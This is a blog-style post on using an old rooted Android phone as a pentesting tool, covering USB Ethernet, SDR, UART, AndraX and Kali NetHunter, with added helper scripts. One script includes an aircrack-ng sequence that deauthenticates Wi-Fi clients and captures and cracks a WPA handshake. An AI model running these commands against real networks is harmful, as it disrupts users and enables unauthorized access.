Not only Flipper Zero: a hacker multitool from an old smartphone
They say that laziness is the engine of progress. For me, competition works better. The freedom to choose devices, applications, and information is what drives developers to create and improve their products today. In this post I want to look at what alternatives there are to the famous pentesting gadget. Make yourself comfortable, and welcome under the cut.
Why a smartphone?
The choice of devices available to a vulnerability researcher is now very wide: from a tiny but powerful UMPC like the GPD Win 4 to a single-board computer like the Raspberry Pi Zero. Out of the box, such devices have nothing to do with penetration testing or with exploiting undocumented features; that is entirely the domain of software, from home-made scripts to ready-made distributions like Kali Linux (formerly BackTrack).
But each such device comes with a fixed set of interfaces for talking to the outside world, and that set is the first thing that limits what it can do. In most cases the number of interfaces can be extended with add-on "modules": an extra network card, a wireless interface, or some kind of RFID tag programmer. This is a reasonable but fiddly path: you have to check that the hardware is compatible and that drivers and software exist for your particular platform.
Nearly everyone has a slightly outdated Android smartphone lying around, and that is exactly a portable computer with a bunch of interfaces and a fairly well-defined procedure for attaching additional devices. Using a smartphone for pentesting looks attractive right up until it is time to count the available interfaces and to find out whether superuser access can be obtained freely. The first is easy to pick up from the specifications of a particular device. The second is not so simple: not every smartphone can be rooted easily, and for some models it is not possible at all. So the first step when choosing a device is to look at a specialized forum like 4pda and make sure the phone can be subjected to this wonderful procedure.
Ethernet
Now a few words about attaching additional interfaces, where Android is often capable of surprising. For example, I decided to check whether my old smartphone would recognize the simplest 100 Mbps USB network card. To connect the USB device I used a hub that has USB Type-C on one side and USB-A, HDMI, VGA, and a 3.5 mm jack on the other:
From my stash I dig out the simplest USB network adapter, assembled in China, plug it into the hub and the hub into the smartphone. For the sake of the experiment I turn off mobile data and Wi-Fi. A second later a new <···> icon appears in the status bar, and voila, the network works. Now I know for sure that connecting almost any smartphone to an ordinary wired network or network device is not a problem: the drivers for such adapters are usually built into the kernel, so it comes up with no fuss at all.
I only had three old smartphones at hand, so I decided to check if this would work with all of them:
Huawei P9 Lite (Android 9) — works.
Huawei P Smart Z (EMUI 12) — works.
Blackview P6600 Pro (Android 11) — unexpectedly does not work, although the USB hub does see it.
An interesting but logical picture emerges. If the firmware vendor did not strip the standard USB network drivers (the usbnet layer and the ASIX, Realtek, SMSC or CDC-ECM class drivers that cover most dongles) out of the kernel, everything works without problems. Otherwise the only option is to add the missing driver to the kernel yourself, which will not always succeed. But let's give the Blackview another chance and plug one of my favorite Chinese RTL-SDR USB dongles into it.
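Before spending an evening on a dongle that will never come up, it is worth asking the kernel itself what it was built with. The script below is an added example, not code from the original post: it checks an Android kernel's build config for the usbnet core and the common USB Ethernet drivers. It assumes /proc/config.gz is readable on your device (Android's base kernel config requires it to be present, but reading it may still need root or an adb shell that SELinux allows); the config fragment at the bottom is constructed to stand in for a real one.

```shell
#!/bin/sh
# Added example (not from the original post): which USB Ethernet drivers
# did the phone's kernel ship with? Assumes /proc/config.gz is readable
# (root may be needed on some firmware).
#
# On a real phone:
#   adb shell 'zcat /proc/config.gz' > config.txt
#   . ./usbnet_check.sh; usbnet_drivers_enabled "$(cat config.txt)"
# Quick live checks after plugging the dongle in:
#   adb shell dmesg | grep -i -E 'usb|eth'    # "registered new interface driver"?
#   adb shell ip link                         # a new eth0/usb0 link?

# Kernel options and the hardware they cover:
#   USB_USBNET               core layer every driver below depends on
#   USB_NET_AX8817X          ASIX AX88772 (most no-name 100 Mbit dongles)
#   USB_NET_AX88179_178A     ASIX gigabit dongles
#   USB_RTL8150 / USB_RTL8152   Realtek 100 Mbit / gigabit
#   USB_NET_SMSC95XX         SMSC LAN9500 family
#   USB_NET_CDCETHER / USB_NET_CDC_NCM   USB class drivers (CDC-ECM/NCM)
#   USB_NET_DM9601           Davicom
USBNET_OPTIONS="USB_USBNET USB_NET_AX8817X USB_NET_AX88179_178A USB_RTL8150 \
USB_RTL8152 USB_NET_SMSC95XX USB_NET_CDCETHER USB_NET_CDC_NCM USB_NET_DM9601"

# usbnet_drivers_enabled CONFIG_TEXT
# Prints each listed option that is built in (=y) or a module (=m).
# Returns 1 when the USB_USBNET core itself is absent: then no such dongle
# can work without a rebuilt kernel, whatever vendor driver you add.
usbnet_drivers_enabled() {
    _cfg=$1
    _core=1
    for _opt in $USBNET_OPTIONS; do
        _state=$(printf '%s\n' "$_cfg" | sed -n "s/^CONFIG_${_opt}=\([ym]\)\$/\1/p")
        [ -n "$_state" ] || continue
        printf '%s=%s\n' "$_opt" "$_state"
        [ "$_opt" = USB_USBNET ] && _core=0
    done
    return $_core
}

# Constructed config fragment standing in for a real /proc/config.gz:
# core + ASIX present, Realtek and SMSC stripped. A dongle on one of
# those chips would still enumerate on the hub but never get a link.
SAMPLE_CONFIG='CONFIG_USB_USBNET=y
CONFIG_USB_NET_AX8817X=y
CONFIG_USB_NET_AX88179_178A=m
# CONFIG_USB_RTL8152 is not set
CONFIG_USB_NET_CDCETHER=y
# CONFIG_USB_NET_SMSC95XX is not set'

usbnet_drivers_enabled "$SAMPLE_CONFIG" || echo "no usbnet core: only a rebuilt kernel will help"
```

If your dongle's chip is missing from the output while USB_USBNET is present, a module for that one driver built against the phone's kernel headers may be enough; if USB_USBNET itself is missing, you are looking at a full kernel rebuild.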
SDR
But just plugging it in is not enough: to get SDR working we need the right software and a driver for the dongle. Fortunately both are available on Google Play. The program is called SDR Touch, and it turns the combination of a smartphone and an RTL-SDR dongle into a primitive but fully functional SDR receiver. The one condition is that it is only compatible with rooted phones. First we install the SDR Driver application, then SDR Touch, and finally, for $12, we buy a license for this wonderful software.
Everything works perfectly, and now the bundle can be taken anywhere convenient; the huge Blackview battery will keep the resulting SDR receiver running for a long time. Both of my Huawei phones, however, will not work: as far as I know there is no easy way to unlock their bootloaders. The catch is that you need an OEM unlock code, which Huawei issued only on request and only until 2018. After that it was over: no root rights for you and no interest in your complaints. There seem to be paid utilities, but nobody guarantees the result. If any reader has a working unlocking method, I would be very grateful to hear it.
UART
Next I tried a USB-to-UART adapter on an FTDI chip to talk to other devices over UART. For the test I connect to a Raspberry Pi 3 B+ on which the UART has been enabled beforehand on the standard pins (enable_uart=1 in config.txt on the bootfs partition). TX on one side always goes to RX on the other, and the adapter must be set to 3.3 V logic, since the Pi's GPIO pins are not 5 V tolerant:
RPi pin 8 / GPIO14 (TXD) — FTDI RXD;
RPi pin 10 / GPIO15 (RXD) — FTDI TXD;
RPi pin 6 / Ground — FTDI GND.
On the Android side there are convenient applications such as Serial USB Terminal and UsbTerminal. They detect the USB-serial chip automatically and give access to the device in a couple of taps:
Now we boot the "raspberry", and after a few seconds we see the login prompt of the serial console:
We enter the user's login and password, after which we have full control. For simple everyday commands there is no need to attach a monitor and keyboard. At this point the phone is acting purely as an input/output device, yet it gives full control without tying up Wi-Fi or Bluetooth, leaving those radios free for more interesting things.
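The Pi side of this setup is two edits in the boot partition, and it is easy to get one of them half right (a commented-out enable_uart line, or a console= argument the kernel never sees). The script below is an added example, not the post's own code: it makes both edits idempotently and offers a check to run before rebooting. It does on named files what raspi-config's "Serial Port" login-shell option does on a live system, so it can also be run from another machine against a mounted SD card. The paths are assumptions: current Raspberry Pi OS keeps config.txt and cmdline.txt under /boot/firmware/, older releases under /boot/.

```shell
#!/bin/sh
# Added example (not from the original post): prepare a Raspberry Pi bootfs
# so a phone with a USB-serial adapter and a terminal app gets a login
# prompt on GPIO14/15. Assumed paths on current Raspberry Pi OS:
#   /boot/firmware/config.txt  and  /boot/firmware/cmdline.txt
# Pi 3 B+ detail: serial0 is the mini-UART because Bluetooth owns the PL011;
# enable_uart=1 also pins the core clock so the mini-UART baud rate is stable.

# enable_pi_uart_console CONFIG_TXT CMDLINE_TXT
# Idempotent: running it twice leaves exactly one enable_uart=1 line and one
# console=serial0,115200 argument.
enable_pi_uart_console() {
    _config=$1
    _cmdline=$2

    # 1. Firmware side: turn the UART on. Only an uncommented line counts;
    #    "# enable_uart=1" is the default comment in many config.txt files.
    if grep -q '^enable_uart=1$' "$_config"; then
        :
    elif grep -q '^enable_uart=' "$_config"; then
        sed 's/^enable_uart=.*/enable_uart=1/' "$_config" > "$_config.tmp" \
            && mv "$_config.tmp" "$_config"
    else
        printf '\n# serial console on GPIO14/15 (pins 8/10), 3.3 V logic only\nenable_uart=1\n' >> "$_config"
    fi

    # 2. Kernel side: put the console on serial0 at 115200 8N1. systemd then
    #    starts serial-getty@<tty> for that console, which is the login prompt
    #    the phone sees. cmdline.txt is a single line, so just prepend.
    if ! grep -q 'console=serial0,115200' "$_cmdline"; then
        sed '1s/^/console=serial0,115200 /' "$_cmdline" > "$_cmdline.tmp" \
            && mv "$_cmdline.tmp" "$_cmdline"
    fi
}

# uart_console_configured CONFIG_TXT CMDLINE_TXT
# Returns 0 when both halves are in place; run it before rebooting.
uart_console_configured() {
    grep -q '^enable_uart=1$' "$1" && grep -q 'console=serial0,115200' "$2"
}

# After booting, on the Pi itself:
#   ls -l /dev/serial0                    -> ttyS0 on a Pi 3 (mini-UART)
#   systemctl status serial-getty@ttyS0   -> the getty that prompts for login
# In the phone's terminal app: 115200 baud, 8 data bits, no parity, 1 stop bit.
```

Leaving console=tty1 in place alongside the new argument is intentional: the kernel logs to both, and you keep a local console if the serial link is ever wired wrong.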
AndraX
Let's move on to the most interesting part. Since Android is built on the Linux kernel, scripts originally written for Linux can run on it. One independent developer decided it would be nice to take the Metasploit Framework, add Nmap, Aircrack-ng, and a lot of other goodies, and wrap them in a convenient launcher. This is how AndraX was born, promising to turn almost any smartphone running Android 5 or newer into a pentester's tool.
In words everything is easy and clear; in reality it is extremely disappointing. Tools that are not tied to specific smartphone hardware do work. But as soon as it comes to, for example, capturing the handshake of a WPA-protected wireless network, a number of problems arise.
Attacks of this kind require the Wi-Fi adapter to be switched into monitor mode. This is often loosely called "promiscuous" mode, but it is a different thing: promiscuous mode on a wired or associated NIC only lifts the destination-address filter, while monitor mode delivers raw 802.11 frames, including the management frames that make up the handshake, without associating to any network at all. Forcing a client to re-authenticate, so that the handshake shows up on demand rather than whenever someone happens to connect, additionally needs packet injection. Firstly, not every Wi-Fi adapter allows this trick, although after some dancing with a tambourine it does work on certain smartphone models, such as the Xiaomi Redmi Note 3. Secondly, without root it will not work either. And if you attach an external Wi-Fi adapter, there is a high probability that it will not work "out of the box": you will have to patch the kernel and then flash the phone with it. There are plenty of ways to break something along the way.
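The first question to settle is therefore whether the driver advertises monitor mode at all, and `iw list` answers it per radio. The script below is an added example, not code from the original post, AndraX or NetHunter: it pulls the phys that list monitor mode out of `iw list` output, and keeps the usual aircrack-ng capture sequence in a function that is deliberately not run here, since it needs root, a capable adapter and a network you are authorized to test. The interface name, the "mon" suffix airmon-ng gives the monitor interface, and the `iw list` excerpt are all assumptions or constructed.

```shell
#!/bin/sh
# Added example (not from the original post, AndraX or NetHunter):
# (1) does any Wi-Fi phy on this device support monitor mode?
# (2) the aircrack-ng handshake capture sequence, as a function only.

# phys_with_monitor_mode IW_LIST_OUTPUT
# Prints every phy whose "Supported interface modes" block lists monitor;
# returns 1 if none does (then only a different kernel or adapter will help).
phys_with_monitor_mode() {
    printf '%s\n' "$1" | awk '
        /^Wiphy /                     { phy = $2 }
        /Supported interface modes:/  { inblock = 1; next }
        inblock && $1 != "*"          { inblock = 0 }   # block ends at the first line that is not a "* mode" entry
        inblock && $2 == "monitor"    { print phy; found = 1 }
        END                           { exit found ? 0 : 1 }
    '
}

# capture_wpa_handshake IFACE BSSID CHANNEL OUTPREFIX   (root; NOT run here)
# Interface naming (IFACE + "mon") is what current airmon-ng does; verify with
# `iw dev` on your phone before relying on it.
capture_wpa_handshake() {
    _iface=$1; _bssid=$2; _chan=$3; _out=$4
    airmon-ng check kill                        # stop wpa_supplicant & friends from flipping the card back to managed
    airmon-ng start "$_iface" "$_chan"          # creates the monitor interface
    _mon="${_iface}mon"
    aireplay-ng --test "$_mon"                  # injection test; without injection you can only wait passively
    airodump-ng --bssid "$_bssid" -c "$_chan" -w "$_out" "$_mon" &   # "WPA handshake:" appears in its header on success
    _dump=$!
    sleep 5
    aireplay-ng --deauth 5 -a "$_bssid" "$_mon" # kick clients so they re-associate and redo the 4-way handshake
    sleep 20
    kill "$_dump"
    aircrack-ng "${_out}-01.cap"                # network list shows "1 handshake" when the capture is usable
}

# Constructed `iw list` excerpt (not from a real phone): phy0 is the phone's
# internal radio without monitor mode, phy1 an external adapter that has it.
SAMPLE_IW_LIST='Wiphy phy0
    Supported interface modes:
         * managed
         * AP
         * P2P-client
         * P2P-GO
    Band 1:
        Capabilities: 0x1ff
Wiphy phy1
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * monitor
         * P2P-client
    Band 1:
        Capabilities: 0x1072'

phys_with_monitor_mode "$SAMPLE_IW_LIST" || echo "no phy supports monitor mode"
```

A phy that lists monitor mode is necessary but not sufficient: whether deauthentication works is a separate question that only `aireplay-ng --test` answers, and on a phone the internal radio's firmware is the usual culprit when injection fails even though capture works.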
At some point the creator of AndraX decided to stir up hype: he deleted the official group and the project repositories, and then spread a rumor that the developer had been killed. A couple of weeks later he triumphantly returned to the network with an "I'm back, m*f***", and yet another release followed. The story made a lot of noise at the time; the discussion can be found on 4pda.
As of this post, the project is more dead than alive. The official site is down, and downloading custom builds is anything but safe, so everything here is strictly at your own risk. The APKs and an archive with the scripts have been spotted on GitHub, but there is no guarantee that any of it works at all. I checked in several Android emulators, but none of them worked correctly.
Kali NetHunter
Now let's look at another interesting project for turning an Android smartphone into a pentester's tool. Kali NetHunter is a separate branch of the Kali Linux project. Its developers did not do things by halves and released the toolset in three editions:
NetHunter Rootless for smartphones without root.
NetHunter Lite for rooted devices with a custom recovery but no NetHunter kernel.
NetHunter for rooted phones of specific models for which the developers ship a custom kernel.
The last option lets you go all out, because the modified kernel makes possible the tricks the stock kernel is not capable of (monitor mode and packet injection, USB gadget roles). There is also an option to connect an ordinary monitor over HDMI and get a full desktop with the basic tools. Surprisingly, there are even a couple of images for smartwatches running Wear OS (TicWatch Pro/Pro 4G/LTE/Pro 2020 and TicWatch Pro 3 GPS/Pro 3 LTE/Pro 3 Ultra GPS/Pro 3 Ultra LTE).
It is worth noting right away that, unlike AndraX, the Kali NetHunter project is alive and regularly updated. As the base firmware the recommendation is plain AOSP or LineageOS (formerly CyanogenMod). In place of the stock recovery you install TWRP, and for superuser rights, Magisk. This bundle gives you full control over the system, at your own risk of course.
The Kali NetHunter set includes a large number of tools, among them ones that let the phone impersonate various USB devices: from a keyboard whose keystrokes are pre-programmed (HID attacks) to a USB mass-storage drive that presents any ISO/IMG image to the host. And if your smartphone is not on the supported list, you can try to build a kernel for your specific model with the project's kernel builder.
The project stands out for its good documentation, which is updated and extended more or less regularly. Questions can be asked on Discord or IRC (#kali-linux on irc.oftc.net), and there are forums and discussions of the published images on XDA.
What it comes down to
It is definitely possible to turn a smartphone into a convenient and functional pentester's tool; the main thing is to choose the right model. The easiest way, in my opinion, is to start from the list of available Kali NetHunter images and buy the right device on the second-hand market, where there are more than enough offers. Even then, be prepared to spend many hours getting everything to work correctly.
As for the comparison with Flipper Zero, it all depends on the task at hand. If you need a portable device that can talk over UART, almost any rooted phone with a suitable USB-to-UART adapter will do. For more flexibility you can just as well take an Arduino Mega and get a full set of GPIO to work with.
Porting Kali NetHunter itself to your device is a big task, not one for a single evening. It can even become a separate hobby for those who enjoy studying operating systems and building their own kernels. There is plenty of room for creativity here, and a successful result is something to be rightfully proud of.
Have you tried turning your Android smartphone into a pentester tool? Share in the comments.